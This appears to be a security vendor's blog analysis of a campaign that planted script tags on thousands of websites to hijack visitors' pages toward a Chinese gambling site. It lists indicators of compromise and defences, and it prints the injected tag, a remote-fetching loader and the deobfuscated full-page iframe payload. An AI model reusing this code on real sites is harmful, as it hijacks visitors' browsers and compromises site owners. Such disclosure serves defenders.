Over 35,000 Websites Targeted in Full-Page Hijack Linking to a Chinese-Language Gambling Scam

A new malware campaign has compromised 35,000+ websites, injecting a malicious script from the websites listed below. Once the script loads, it fully hijacks the user’s browser window—often redirecting them to pages promoting a Chinese-language gambling (or casino) platform.

The attack appears to be targeting or originating from regions where Mandarin is common, and the final landing pages present gambling content under the “Kaiyun” brand.

List of Indicators of Compromise (IoCs):

• Mlbetjs[.]com (18k+ infected websites) - publicwww link
• Ptfafajs[.]com (9k+ infected websites) - publicwww link
• Zuizhongjs[.]com (4.8k+ infected websites) - publicwww link
• Jbwzzzjs[.]com (2.9k+ infected websites) - publicwww link
• Jpbkte[.]com (30+ infected websites) - publicwww link

Have you encountered similar redirects, or new IoCs? Please share them or reach out to our team. By pooling data, we can identify and dismantle evolving threats more quickly.

All sites linked above show the following message:

Translated:

Congratulations, the site was created successfully!
This is the default index.html. This page is automatically generated by the system.
This page is index.html in the FTP root directory
You can modify, delete or overwrite this page
For FTP related information, please go to "Panel System Backstage > FTP" to view

The Infection Process

As an example, we analyzed zuizhongjs[.]com.

Attackers place a one-line <script> tag referencing zuizhongjs[.]com directly into site files (e.g., in the <head> or at the bottom of <body>). Below is an example of the injected code:

<script language="javascript"
        src="https://www.zuizhongjs[.]com/js/24/12/7/ky1.js"
        type="text/javascript"></script>

Obfuscated Loader

Inside the loaded file, the attackers use a JavaScript snippet that writes another script element to fetch additional malware:

;(function(o, q, f, e, w, j) {
    w = q.createElement(f);
    j = q.getElementsByTagName(f)[0];
    w.async = 1;
    w.src = e;
    j.parentNode.insertBefore(w, j);
})(window, document, 'script', `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);

The above code uses string concatenation and eval() to hide its true purpose. It injects a new <script> tag, pulling the main payload from the same malicious domain.

Primary Payload (Deobfuscated)

Below is a simplified version of the primary script, showing key functionality:

function isMobile() {
    return navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i) ? true : false;
}

var url = "https://www.zuizhongjs[.]com/go/kaiyun1/ky.html";

function getIosVersion() {
    var str = navigator.userAgent.toLowerCase();
    var ver = str.match(/cpu iphone os (.*?) like mac os/);
    return ver ? parseInt(ver[1].slice(0,2)) : false;
}

var u = navigator.userAgent;
var isIOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);

function randomNum(minNum, maxNum) {
    return parseInt(Math.random() * (maxNum - minNum + 1) + minNum, 10);
}

const time = randomNum(500, 1000);
console.log(time);

document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{width:100%;height:100%;overflow:hidden; clear:both;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
document.write('<iframe src="' + url + '" frameborder="0" style="border:0;width: 100%; text-align: center; height:100%;max-height: 4000px;"></iframe>');
document.write('</div>');

Key Takeaways

1. Device Detection
   • Uses functions like isMobile(), getIosVersion(), isIOS to tailor the payload for specific devices or operating systems.
2. Random Delay
   • randomNum(500, 1000) introduces a 500–1000 ms delay to avoid automated scanning or sandbox detection.
3. Fullscreen Hijack
   • The code injects a <div> and <iframe> that completely covers the page, replacing any original content.
4. Obfuscated URL
   • The initial url may be further obfuscated (e.g., via Unicode escapes). Currently, it points to https://www.zuizhongjs[.]com/go/kaiyun1/ky.html.
5. Final Redirection
   • Once fully executed, some users are sent to a second domain—for instance, https://www.p11vt3[.]vip:6002/register50154?i_code=21708264—typical of phishing or fraudulent sign-up flows.

Attackers appear to funnel traffic to a Chinese-language gambling (or casino) site operating under the brand “Kaiyun.” 

During our analysis, we identified a few variants on infected websites:

Some IPs or regions see a page stating access is blocked. It instructs users to contact an email or “online support,” possibly to weed out security researchers or reduce unwanted traffic.

Possible Connection to Megalayer Exploit

Our analysis suggests this campaign may be related to the Megalayer exploit, known for distributing Chinese-language malware. Signs include:

• Localization: Chinese text, references to Mandarin-speaking audiences.
• Domain Patterns: The structure of zuizhongjs[.]com, plus multiple redirect domains using .vip or other TLDs favored by certain threat actors.
• Obfuscation Tactics: Unicode-escaped URLs, code-based delays, etc.

How to Protect Your Website

c/side's proxy analyzes the payload of every script request in real-time. Should a script try to load a malicious version, we will spot it, block it from loading, and alert your team.

c/side has already blocked this attack for our users, providing real-time analysis and proactive defense. If you suspect your site is infected, contact your security vendor or hosting provider immediately.

1. Audit Your Source Code
   • Check your HTML, theme files, and CMS templates for any unauthorized <script> tags referencing zuizhongjs[.]com or similarly suspicious domains.
2. Block Malicious Domains
   • Use firewall rules or DNS-level blocking for:
     • zuizhongjs[.]com
     • p11vt3[.]vip (and associated subdomains)
   • Monitor logs for unexpected outgoing requests to these domains.
3. Check for Unauthorized Modifications
   • Regularly review your hosting account or use a file integrity checker.
   • Any unexplained change in core files might indicate a backdoor or injection point.
4. Content Security Policy (CSP)
   • Restrict scripts to only trusted domains with a well-defined CSP.
   • Prevent inline scripts and unknown sources from loading.
5. Frequent Site Scans
   • Tools like PublicWWW or URLScan can uncover malicious injections at scale.

The ZuizhongJS malware campaign demonstrates how a single injected script can hijack thousands of websites, redirecting unsuspecting users to Chinese-language gambling portals. The presence of well-known soccer logos and sports references suggests a bid for legitimacy, but the entire operation appears unlicensed or outright fraudulent.

• Website Owners: Remove any injected scripts, block malicious domains, and strengthen your security configuration to prevent re-infection.
• Security Researchers: Further exploration is needed to confirm the link to Megalayer, pinpoint the exact infiltration methods (e.g., vulnerable CMS plugins, stolen credentials), and track additional domains.

c/side has successfully detected and blocked this attack. If you're concerned about potential infections, our system can provide real-time analysis and proactive defense.

Book a call/demo or sign up now.